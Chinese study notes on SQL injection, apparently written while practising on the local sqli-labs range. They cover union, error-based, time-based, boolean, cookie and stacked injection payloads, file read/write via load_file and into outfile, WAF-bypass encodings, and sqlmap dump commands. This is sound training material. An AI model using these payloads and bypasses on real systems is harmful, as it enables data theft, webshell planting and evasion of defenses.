2-SQL注入渗透与攻防

1、SQL注入基础

1.1 什么是sql注入

一、SQL注入概述

二、数据库概述

1.关系型数据库

关系型数据库，存储格式可以直观的反映实体间的关系，和常见的表格比较相似
关系型数据库中表与表之间有很多复杂的关联关系的
常见的关系型数据库有MySQL、Orcale、PostgreSQL、SQL Server等

2.非关系型

随着近些年技术方向的不断扩大，大量的NoSQL数据库如 Mon goDB，Redis出于简化数据库结构，避免冗余或影响性能的表连接。摒弃复杂分布式的目的被设计
NoSQL数据库适合追求速度和可拓展性，业务多变的场景

1.2 MYSQL语句语法

一、回顾SQL语句语法

打开phpstudy启动服务，进入mysql/bin，进入cmd
进行登录 mysql -uroot -proot -h 127.0.0.1

查询当前数据库服务器所有的数据库：show databases;
选中某个数据库：use 数据库名字;
查询当前数据库所有的表：show tables;
查询t1表所有数据：select * from t1;
条件查询：select * from t1 where id=1;

合并查询：select * from t1 where id=2 union select * from t1 where pass=111;
2个特性：前面的查询语句 和 后面的查询语句 结果互不干扰！
前面的查询语句的字段数量 和 后面的查询语句字段的数量 要一致(比如*号)
报错：select id from t1 where id=2 union select * from t1 where pass=111;
修改：select id from t1 where id=2 union select pass from t1 where pass=111;

排序：select * from t1 order by pass;
在sql注入中用来拆解表的列数
用法：order by 1;order by 2;...;一直到报错位置，可以爆破出当前的表有几列

1.3 系统库

一、系统库

提供了访问数据库元数据的方式，是系统自带的数据库(一共四个)
元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。

1.information_schema库（61张表）

是信息数据库，其中保存着关于MySQL服务器所维护的所有其他数据库的信息；例如数据库或表的名称，列的数据类型或访问权限。有时用于此信息的其他术语是数据字典和系统目录。web渗透过程中用途很大。

SCHEMATA表：提供了当前MySQL实例中所有数据库信息，show databases结果取之此表的SCHEMA_NAME字段。TABLES表：提供了关于数据中表的信息。table_nameCOLUMNS表：提供了表的列信息，详细描述了某张表的所有字段的字段信息。column_name

2.performance_schema库（87张表）

MySQL5.5开始新增一个数据库：PERFORMANCE_SCHEMA，主要用于收集数据库服务器性能参数。内存数据库，数据放在内存中直接操作的数据库。相对于磁盘，内存的教据渎写速度要高出几个数量级。

3.mysql库

是核心数据库，类似于sqlserver中的master表，主要负责存储数据库的用户(账户)信息、权限设置、关键字等mysql自己需要使用的控制和管理信息。不可以删除。如果对mysql不是很了解，也不要轻易修改这个数据库里面的表信息。常用举例：在mysql.user表中修改root用户的密码。

4.sys库（1个表，100个视图）

sys库是MySQL5.7增加的系统数据库，这个库是通过视图的形式把information_schema和performance_schema结合起来，查询出更加令人容易理解的数据。可以查询谁使用了最多的资源，哪张表访问最多等。

2、MYSQL手工注入

2.1 sqli-labs环境搭建

SQLi-Labs是一个专业的SQL注入练习平台，适用于GET和POST场景，包含了以下注入：
1、基于错误的注入（Union Select）
字符串
整数
2、基于误差的注入（双查询注入）
3、盲注入（01、基于Boolian数据类型注入，02、基于时间注入）
4、更新查询注入（update）
5、插入查询注入（insert）
6、Header头部注入（01、基于Referer注入，02、基于UserAgent注入，03、基于cookie注入）
7、二阶注入，也可叫二次注入
8、绕过WAF
绕过黑名单\过滤器\剥离\注释剥离 OR & AND 剥离空格 和 注释剥离UNION和SELECT
隐瞒不匹配
9、绕过addslashes()函数
10、绕过mysql_real_escape_string()函数（在特殊条件下）
11、堆叠注入（堆查询注入）
12、二级通道提取

2.2 手注

一、SQL注入知识点

二、SQL注入流程（SQLi第二关）

浏览器进行数据提交到服务器：
GET提交：通过URL提交 数据长度有限制 速度快
POST提交：直接通过服务器提交 安全性高 可通过数据量大

1.有无注入点 (and 1 = 1;)

或随便输入内容，若报错则说明有注入点，没报错则说明有可能被过滤了

2.猜解列名数量 (order by 1(2)(3))

不断尝试直到报错 （%20表示空格）

3.通过报错方式，判断回显点 (.../index.php?id=-1 union select 1,2,3)

由于union需要 前面的 和 后面的 字段要保持一致，所以需要猜解列名

4.信息收集 (union select 1,version(),database())

通过回显点，进行信息收集
数据库版本 version()、数据库名database()
收集所有库名union select 1,group_concat(schema_name),3 from information_schema.schemata

5.查询库中有哪些表名

数据库库名：security
通过系统库查找表名：information_schema.tables
table_name
查询security库下面的所有的表名：
(union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security')
表名很多时，不一定在页面能显示----group_concat(table_name)合并相同值
security字符可以 转换 database()代替

6.查询表里有哪些字段

表名：users
(union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users')
users字符可以 转换 成16进制0x7573657273代替

7.查询数据

发现users表中有username、password字段
select username,password from users;

union select 1,2,(select group_concat(username,0x3a,password) from users)
0x3a表示分号符‘:’

2.3 高权限注入(上)

多个网站的不同数据库，是可以部署在同一个mysql服务器中的

一、MySQL权限介绍

系统库mysql数据库中，存在4个控制权限的表，分别为user表，db表，tables_priv表，columns_priv表。权限从大到小-依次排列

1.查看mysql有哪些用户

select user,host from mysql.user;

2.查看用户对应权限

select * from user where user='root' and host='localhost'\G;
（\G表示按列打印）

3.创建mysql用户

执行create user/grant命令
CREATE USER 'test1'@'localhost' IDENTIFIED BY '123456';

4.只提供id查询权限

grant select(id) on test.t1 to test1@'localhost' identified by '123456';

5.把普通用户变成管理员

grant all privileges on . to 'test1'@'localhost' with grant option;

6.删除用户

use mysql
drop user test1@'localhost';

2.4 高权限注入(下)

同2.3流程，但是不同的是，通过SQLI的数据库，拿到test数据库下的数据。
条件1：用户权限必须为root
条件2：只能对高版本的Mysql进行注入，依赖information库

2.5 SQL注入之文件读写

原理：利用文件的读写权限进行注入，可以写入一句话木马 或 读取系统文件的敏感信息。

一、文件读写注入条件

为root用户
高版本的MYSQL添加了一个新特性secure_file_priv该选项限制了mysql导出文件的权限。
secure_file_priv选项

linux
cat /etc/my.cnf[mysqld]secure_file_priv=winmy.ini[mysqld]secure_file_priv=

show global variables like '%secure%'; 查看mysql全局变量的配置

1.读写文件需要secure_file_priv权限

secure_file_priv="" 代表文件读写没有限制
secure_file_priv=NULL 代表不能读写文件
secure_file_priv=d:/phpstudy/mysql/data 代表只能对该路径下的文件进行读写

2.常见网站绝对路径

Windows常见：

Phpstudy    phpstudy/wwwphpstudy/PHPTutorial/www
Xampp       xampp/htdocs
Wamp        wamp/www
Appser      apppser/www

Linux常见：

/var/mysql/data
/var/www/html

路径获取常见方式：
报错显示，遗留文件，漏洞报错，平台配置文件等

3.读取文件(第二关)

使用函数：load_file()
后面的路径可以是单引号，0x，char转换的字符。
注意：路径中的斜杠是/不是
一般可以与union中作为一个字段使用，查看config.php(即mysql密码)，apache配置...
select load_file('c:/test/t1.txt');
?id=-1 union select 1,load_file('c:/test/t1.txt'),3

4.写入文件

使用函数：Into Outfile(能写入多行，按格式输出) 和 into Dumpfile(只能写入一行且没有输出格式)
outfile 后面不能0x开头或者char转换以后的路径，只能是单引号路径
?id=-1 union select 1,'88888888',3 into outfile 'c:/test/t2.txt' --+
(报错，由于存在LIMIT 0,1，所以把后面用--+进行注释)
(LIMIT 0,1 表示从0开始，前进1位数字。如有A、B、C、D、E数据，一行显示不下)
(则0,1显示A，1,1显示B，2,1显示C，3,1显示D)

2.6 SQL注入之基础防护

发现无论是读取还是写入文件，都需要路径
例如可以用php自带的魔术引号(Magic Quote)来进行防御

一、魔术引号

是一个自动将进行PHP脚本的数据进行转义的过程，会在' " /前面加入反斜杠\转义符
在php.ini文件内找到

magic_quotes_gpc = On  开启
magic_quotes_gpc = Off 关闭

但是很容易被绕过，且对程序员有一定的影响。

二、内置函数

1.做数据类型的过滤/判断，限制传入的数据类型
2.关键字过滤

3、数据类型与提交方式

3.1 数据类型

进行SQL注入第一步，判断有无SQL注入点(随意输入，如:id=1)

一、数字型注入点（第二关）

$id = $_GET(id)
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
发现(and 1 = 1)显示结果；
发现(and 1 = 2)不显示结果；

二、字符型注入点（第一关）

$id = $_GET(id)
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
发现(and 1 = 1)显示结果；
发现(and 1 = 2)显示结果；
由于mysql将 id = '1 and 1 = 2' 当做了一个整体，所以会自动过滤掉1后面的字符

所以当输入?id=1'时，mysql会报错！因为多了一个单引号'，所以存在字符型注入点

三、搜索型注入点

例如存在你搜索部分关键字，但是sql会帮你自动补全，并显示所有可能的结果
like 模糊查询
% % 通配符

、%23、--+ 是注释符

select * from users where username like '%D%'（包含d的数据）

注入方式：y%' or 1=1#
会显示所有数据，而不是包含y的数据，因为or 1=1始终为ture

四、其他型注入点

除了单引号' 双引号" 还可能有括号()

为了闭合！！

3.2 提交方式

一、GET方式注入

主要是通过url中传输数据到后台，带入到数据库中去执行，可利用联合注入方式直接注入
场景：数据不敏感，安全需求不高，长度有限2kb，速度快

二、POST方式注入（第11关）

post提交方式主要适用于表单form的提交，用于登陆框的注入，数据直接传递给服务器

方法：利用BurpSuite抓包进行重放修改内容进行，和get差别是需要借助抓包工具进行测试，返回结果主要为代码，也可以转化为网页显示

三、Cookie提交注入

$c = $_COOKIE['s'];
通过抓包，修改Cookie参数

三、Request方式注入

$c = $_REQUEST['s'];
理解：无论哪种方式都能提交

$_SERVER[];
例如：该函数可以获取当前用户的IP、主机名等，用于适配移动端和PC端

四、HTTP头注入

3.3 靶场案例练习

一、第11关 Less-11 POST - Error Bassed - Single quotes - String（基于错误的POST型单引号字符型注入）

1.通过抓包工具BurpSuite

查看源码，就是普通的POST提交

在红框处修改sql语句，如：zhangsan' union select 1,database()--+

二、第20关 Less-20 POST -Cookie injections - Uagent field - Error based（基于错误的cookie头部POST注入）

1.通过抓包工具

查看源码，发现虽然调用了POST提交，但是传递到了check_input函数，其中调用了魔术引号，所以Less-11的方法无法注入，考虑cookie注入
Cookie注入：绕过一些常规的防御手段

2.通过admin、admin登录，刷新并且抓包

3.send to repeater，修改其中的cookie数据

4.或删除尾部的Submit，并在头部手动添加Cookie

Cookie:uname=zhangsan' union select 1,2,database()--+

4、查询方式及报错注入

4.1 查询方式

当进行SQL注入时，有很多注入会出现无回显的情况，其中不回显的原因可能是SQL语句查询方式为问题导致的，这个时候我们需要用到报错后者盲注进行后续操作，同时在注入点过程中，提前了解其中SQL语句可以更好地选择对应的注入语句。

一、select查询数据

例如：在网站应用中进行登录，进行数据显示查询操作
select * from user where id=$id

二、delete删除数据

例如：删除购物车中的商品，后台管理后面删除文章删除用户等操作
delete from user where id=$id

三、insert插入数据

例如：在网站应用中进行用户注册添加操作
insert into user (id,name,psw) values(1,'zhangsan','123456')

四、update更新数据

例如：后台中心数据同步或者缓存操作
update user set pwd='p' where id = 1

4.2 报错盲注（基于报错的SQL盲注 - 报错回显）（强制性报错）

当不存在回显点时，则需要用到！！

一、基础函数

1.updatexml():从目标XML中更改包含所有查询值的字符串

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为DOC
第二个参数：XPath_String(Xpath格式字符串)
第三个参数：new_value是String格式，替换查找到的符合条件的数据
updatexml(XML_document,XPath_String,new_value);
'union select 1,extractvalue(1,concat(0x7e,(select version())))%23
(%23是#的意思)
'or updatexml(1,concat(0x7e,database()),0) or'
OR 可以少写一个union

2.extractvalue():从目标XML中返回包含所有查询值的字符串

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为DOC
第二个参数：XPath_String(Xpath格式字符串)
extractvalue(XML_document,XPath_String)
'or extractvalue(1,concat(0x7e,database())) or'

二、利用（第11关）

原理：在XPath参数处，填上我们想要的SQL语句，这样系统会导致强制报错
如：首先使用抓包工具，然后右键Send to Repeater！
union select 1,extractvalue(1,(select version()))%23显示不全
union select 1,extractvalue(1,concat(0x7e,(select version()),0x7e))%23显示完整
(0x7e是波浪线)

达到报错回显的目的！
union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23

同理：updatexml函数
union select 1,updatexml(1,concat(0x7e,(select version()),0x7e),3)%23

4.3 延时注入（基于时间的SQL注入 - 延时判断）

既没有回显点，也没有对应的报错信息！！

一、知识储备

函数	功能
sleep(3)	休眠3秒
if(a,b,c)	a条件成立 执行b，条件不成立 执行c
mid(a,b,c)	从b开始，截取a字符串的c位
substr(a,b,c)	从b开始，截取字符串a的c长度
left(database(),1)	left(a,b)从左侧截取a的前b位
length(database())=8	判断长度
ord=ascii ascii(x)=100	判断x的ascii值是否为100

如：select * from t1 where id=1 and sleep(if(database()='test',3,0));

二、步骤（第二关）

1.猜解数据库名的长度

如果数据库名的长度为8，则转圈圈5秒后相应，否则立即响应
?id=1 and sleep(if(length(database())=8,5,0))

2.一个一个字母猜

通过mid()或substr()函数，两者效果一样
实例：数据库名test
select mid(databaase(),1,1);
显示：t
select mid(databaase(),1,2);
显示：te

或者通过left()函数
实例：数据库名test
select left(database(),3);
显示：tes

截取数据库名的第一位的前两位是否等于'te'
?id=1 and sleep(if(mid(database(),1,2)='te',5,0))

3.联合

security数据库中第一张表为emails
由于选取了limit 0,1所有是emails表，且mid截取了第一个字符'e'，ascii码为101
if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)

4.4 布尔盲注（基于布尔的SQL盲注 - 逻辑判断）

一、什么是布尔盲注？

Web的页面仅仅会返回True和False，那么布尔盲注就是进行SQL注入之后，然后根据页面返回的True或者是False来得到数据库中的相关信息

二、流程

基于无回显的情况下，但是是否查询成功，会显示不同的Web页面(如第5关)，所以可以进行猜

1.判断有无注入点

and 1=1、or 1=1

2.判断数据类型

数字型、字符型、单引号、双引号

3.结合二分法猜解(ascii码0-127)

length()>64 -> length()>96
mid()、substr()、left()

三、靶场实际案例（第5关）

1.猜解数据库的长度

用and连接，看页面是否正常显示
?id=1' and length(database())=8--+

2.猜解数据库的名字

?id=1' and ascii(mid(database(),1,1))>115--+ 非正常
?id=1' and ascii(mid(database(),1,1))>116--+ 非正常
?id=1' and ascii(mid(database(),1,1))=115--+ 正常s
?id=1' and ascii(mid(database(),2,1))=101--+ 正常e
?id=1' and ascii(mid(database(),3,1))=99 --+ 正常c

3.猜解表名

第一张表emails、第二张表referers
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+ 字符e正确emails

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+ 字符m正确emails

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+ 字符r正确referers

盲注总结

盲注分为三种：
1.报错型盲注：根据页面返回的报错信息，来判断的即为报错型盲注
2.时间型盲注：根据页面返回的时间，来判断的即为时间型盲注
3.布尔型盲注：根据页面返回的对错，来判断的即为布尔型盲注

4.5 解密注入（第21关）

1.信息收集

首先通过admin、admin登陆页面，通过抓包可以发现是Cookie注入
其中Cookie:uname=YWRtaW4%3D（发现是base64加密，其中%3D是字符=）

2.可以结合报错注入，爆出数据库名

Cookie:admin' or extractvalue(1,concat(0x7e,database())) or'
修改为：
Cookie:YWRtaW4nIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSBvcic=

4.6 堆叠注入

在SQL中，分号; 是用来表示一条sql语句的结束，试想一下我们在; 结束一个sql语句后面继续构造下一条语句会不会一起执行？因此这个想法也就造就了堆叠注入。

条件：如Oracle不支持

一、实战靶场（第38关）

?id=1';insert into users(id,username.password) values('11','22','33')--+
区别：union 必须 前后的操作和字段 一致，如：都是select且都是*

5、WAF绕过

WAF拦截原理：WAF从规则库中匹配敏感字符进行拦截。
常见：网站安全狗、宝塔、阿里云云盾

5.1 绕过方式

一、数据

大小写、加密解密、编码解码、等价函数、特殊符号、反序列化、注释符混用

二、方式

更改提交方式、变异

三、其他

Fuzz大法、数据库特性、垃圾数据溢出

5.2 绕过姿势

一、防止 and 和 or

如果此时是POST或REQUEST提交。
则可以用firefox hackbar的post提交绕过WAF。

二、关键词大小写绕过

举例：union select ---> unIOn SeLEct

三、内联注释符绕过 ---> 拦截database()、version()整体

思路：发现不会单独拦截database或()，所以想办法分开！
举例：database /**/ () 中间插入注释
外联注释： --+ 、# 、%23
内联注释：/*这个是注释*/

语句：union select = /*!union*/ select
注释符里的感叹号后面的内容会被mysql执行
语句：id=-1 union select 1,database/**/(),3

四、HTTP参污染

原理：对目标发送多个参数，如果目标没有多参数进行多次过滤，那么WAF对多个参数只会识别其中的一个。
举例：?id=1&id=2&id=3
?id=1/**&id=-1%20union%20select%201,2,3%23*/

五、编码绕过

针对WAF过滤的字符编码，如使用URL编码、Unicode编码、十六进制编码、Hex编码等。
举例：union select 1,2,3# ---> union %0a select 1\u002c2,3%23

六、双写绕过

部分WAF只对字符串识别一次，删除敏感字段并拼接剩余语句，这时，我们可以通过双写来进行绕过。
举例：UNIunionON，SELselectECT，anandd

七、同义词替换

and = &&
or = ||
'=' = '=<、>'
空格不能使用 = %09、%0a、%0b、%0c、%0d、%20、%a0等
注：%0a是换行也可以代替空格

总结

WAF绕过思路就是让WAF的检测规则识别不到你所输入的敏感字符，利用上述所介绍的知识点，灵活结合各种方法，从而增加绕过WAF的可能性

order by and or 绕过：%20/*//--/*/
举例：order%20/*//--/*/by 3联合绕过：union/*//--/*/  /*!--+/*%0aselect/*!1,database(),3*/ --+
核心就是：union #%0a换行  selectfrom绕过：/*!06447%23%0afrom*/

%0a表示换行、%20表示空格

6、sqlmap

6.1 sqlmap安装

安装地址：https://sqlmap.org（Kali自带）
可能会访问过多，导致多并发

常用指令：
-u：用于get方式提交，后面跟注入的url网址
-r：加载一个文件
-p：指定扫描的参数
--current-db：当前数据库
--forms：自动检测表单

--dbs：获取所有数据库
--tables：获取所有数据表
--columns：获取所有字段
--dump：打印数据

-D：查询选择某个库
-T：查询选择某个表
-C：查询选择某个字段

--level：执行测试的等级（1~5，默认为1），使用-level参数并且数值>=2的时候会检查cookie里面的参数，当>=3时检查user-agent和referer
--risk：执行测试的风险（0~3，默认为1），默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加or语句的sql注入

6.2 sqlmap使用（get型注入 -u）

cmd执行语句：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1"

修改第二个问题：对于剩余的测试，您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗？

执行成功后，
cmd执行语句：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" --dbs
以及：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" -D "security" --tables
以及：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" -D "security" -T "users" --columns
以及：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-2/?id=1" -D "security" -T "users" -C "id,password,username" --dump

6.3 sqlmap使用（post型注入）

POST型：与数据库交互是通过post数据进行，URL不可见
利用sqlmap进行POST注入，常见的有三种方法：

一、注入方式一（第12关）--> ")闭合

1.用BurpSuite抓包，将抓包内容复制保存到txt中

2.打开cmd进入sqlmap，输入命令

cmd命令：sqlmap.py -r C:\Users\11277\Desktop\渗透\2-SQL注入渗透与攻防\Less_12.txt -p uname --current-db

二、注入方式二：自动搜索表单注入

cmd命令：sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-12/index.php" --forms
会检测网站php源码中的form表单，如uname、passwd、submit，局限：无法进行头部注入